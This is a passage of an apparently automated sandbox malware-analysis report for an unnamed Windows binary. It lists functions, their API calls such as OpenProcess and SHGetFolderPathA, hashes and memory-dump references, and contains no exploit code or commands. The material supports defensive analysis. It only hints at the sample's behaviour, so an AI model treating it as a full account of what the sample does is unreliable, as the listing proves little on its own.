                            • Instruction ID: 04dcd8717b0e5a0c75a5778c74bb9de8b27af0c362a0858b6a363657575bcd0a
                            • Opcode Fuzzy Hash: 834336696a9341deaa00ad1821247489f63f77ff9dd0827ffb93adaa91b8e719
                            • Instruction Fuzzy Hash: E42149399141898ADB24EB75D860BEDF367EF84362FC44056F81C4B2A1E3B1198AC7D5
                            Function 0013ED50 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013ED94
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EDC3
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EDD1
                            • lstrcat.KERNEL32(?,013FE538), ref: 0013EDEC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: ecd869c324a72d6857ee4a6bf420fb90cccb5a0854282a50192589bb500cc95b
                            • Instruction ID: a3e7185591bb078b9a1ae51c6c3065f667c88572f42f85d789be58e73cc1fa4d
                            • Opcode Fuzzy Hash: ecd869c324a72d6857ee4a6bf420fb90cccb5a0854282a50192589bb500cc95b
                            • Instruction Fuzzy Hash: B731C971910128ABCB61EF64EC42BED73B8FF58301F1005A9FA05A7295DF309E548B90
                            Function 00142D30 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0014A5E0,000000FF), ref: 00142D5F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00142D66
                            • GetLocalTime.KERNEL32(?,?,00000000,0014A5E0,000000FF), ref: 00142D72
                            • wsprintfA.USER32 ref: 00142D9E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 0d61c26bcd5b7049630b4b71e55f7cab0df556c2631e3891749d3bea0483de2f
                            • Instruction ID: c0514fafc35bdcff477c24dc250fa06544784c3aef435d9ee91c2b21748b2fa8
                            • Opcode Fuzzy Hash: 0d61c26bcd5b7049630b4b71e55f7cab0df556c2631e3891749d3bea0483de2f
                            • Instruction Fuzzy Hash: 8A0140B2944224ABCB159BC9DD45BBFB7BCFB4CB12F00011AF605A2290E7785440C7B1
                            Function 00144690 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 001446A2
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 001446BD
                            • CloseHandle.KERNEL32(00000000), ref: 001446C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 001446F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: 00b65ab462455fc850f8dac28dca04c757cf4b2579db73dd5fa9c0e8408e8d8c
                            • Instruction ID: a3fd322ec26aa3cab4e9284908f8a33fdabd9570254cd1253a37caeebc506c99
                            • Opcode Fuzzy Hash: 00b65ab462455fc850f8dac28dca04c757cf4b2579db73dd5fa9c0e8408e8d8c
                            • Instruction Fuzzy Hash: 8DF0F6B09017256BE721AB749C49BEABAACAF15305F0005A1FA85D71E0DBB098C18794
                            Function 001491E1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 001491ED
                              • Part of subcall function 00148A0F: __amsg_exit.LIBCMT ref: 00148A1F
                            • __getptd.LIBCMT ref: 00149204
                            • __amsg_exit.LIBCMT ref: 00149212
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00149236
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: c2b3d4e8645c30e12f1657fdadfcd09fc710d9dabc07f5c32d0f45d1eea1ecb1
                            • Instruction ID: f56a6d76fe3b027cea4205d0d943e5d86756c25d9a5eaed12a512b0cbbd6cf97
                            • Opcode Fuzzy Hash: c2b3d4e8645c30e12f1657fdadfcd09fc710d9dabc07f5c32d0f45d1eea1ecb1
                            • Instruction Fuzzy Hash: 04F0B4B2988710EBD721BB78A807F4E33A16F10721F244149F418AB2F2DFA45A41CA55
                            Function 00147520 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(------,00125BEB), ref: 0014752B
                            • lstrcpy.KERNEL32(00000000), ref: 0014754F
                            • lstrcat.KERNEL32(?,------), ref: 00147559
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 1a5e59af63b461e79c1fb2f4368f87f61376f77bc4efc6bedb77142390e7b0b0
                            • Instruction ID: 3b90a6b5b187d61c31de2b1b87527c1d18b209859252a47ee5d1bc6fdf6e0506
                            • Opcode Fuzzy Hash: 1a5e59af63b461e79c1fb2f4368f87f61376f77bc4efc6bedb77142390e7b0b0
                            • Instruction Fuzzy Hash: FFF0ED74911712DFDB219F39D848A27BBF9EF84705714882DA8DACB2A9EB30D840CB10
                            Function 00133520 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00133572
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013359B
                            • lstrcpy.KERNEL32(00000000,?), ref: 001335C1
                            • lstrcpy.KERNEL32(00000000,?), ref: 001335E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 657b6e0a74006a80a77a7cab84808e8ffabc501e12f4ef11a9a1b622c741b4f3
                            • Instruction ID: b46e7773e943fdd281a3cf252781d4a46f6c21a862c7f351b7d4095f8d6fc12e
                            • Opcode Fuzzy Hash: 657b6e0a74006a80a77a7cab84808e8ffabc501e12f4ef11a9a1b622c741b4f3
                            • Instruction Fuzzy Hash: F7121870A01211CFDB29CF19C554B25B7E4AF44729F29C1AEE819DB3A2D772ED82CB44
                            Function 00137D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137DD4
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137DEF
                              • Part of subcall function 00137E80: std::_Xinvalid_argument.LIBCPMT ref: 00137E98
                              • Part of subcall function 00137E80: std::_Xinvalid_argument.LIBCPMT ref: 00137EB6
                              • Part of subcall function 00137E80: std::_Xinvalid_argument.LIBCPMT ref: 00137ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: 931de28e3d8ccfceebb663b57db9b97d7cd3866619ca5051473620c1537df31e
                            • Instruction ID: 7e360ecdc025b0d711e31c5a62a14b4b0127abc18cf638c9672e07cd96c959fb
                            • Opcode Fuzzy Hash: 931de28e3d8ccfceebb663b57db9b97d7cd3866619ca5051473620c1537df31e
                            • Instruction Fuzzy Hash: 6731E6B23086509BE734DDACE89097AF7E9EF91760F204A3AF4528B6C1D7719C4083E4
                            Function 00126EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00126F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00126F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: d5340f9a27895a0f059d307fae1786c3aa16626e7c1cff2c4d5ccf2d125d561c
                            • Instruction ID: e659f5dd3e594e53e1d1361005adab482b64cc10cceb20e3e84d33eeeead2056
                            • Opcode Fuzzy Hash: d5340f9a27895a0f059d307fae1786c3aa16626e7c1cff2c4d5ccf2d125d561c
                            • Instruction Fuzzy Hash: 53218E716007119BEB20CB24ED91BBA73A8EB41705F444878F946CBAC4E779E955C750
                            Function 00121530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000), ref: 0012162D
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000,?), ref: 0012164F
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000,?), ref: 00121671
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000,?), ref: 00121693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121579
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: a5f14ca9e326f8c36c47142b36ac065a7dbf0d235318426eb5b4b14d7e8b675f
                            • Instruction ID: c0b4a7a7897ac3e5530fe39a663693be823ad3c19a37053bf455661f4ccc2d2b
                            • Opcode Fuzzy Hash: a5f14ca9e326f8c36c47142b36ac065a7dbf0d235318426eb5b4b14d7e8b675f
                            • Instruction Fuzzy Hash: DE31C575A01B22AFC729DF3AD588956BBF5BF59305700492EE896C3B10DB30F861CB80
                            Function 00141740 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00141771
                            • lstrcpy.KERNEL32(00000000,?), ref: 001417A9
                            • lstrcpy.KERNEL32(00000000,?), ref: 001417E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00141819
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
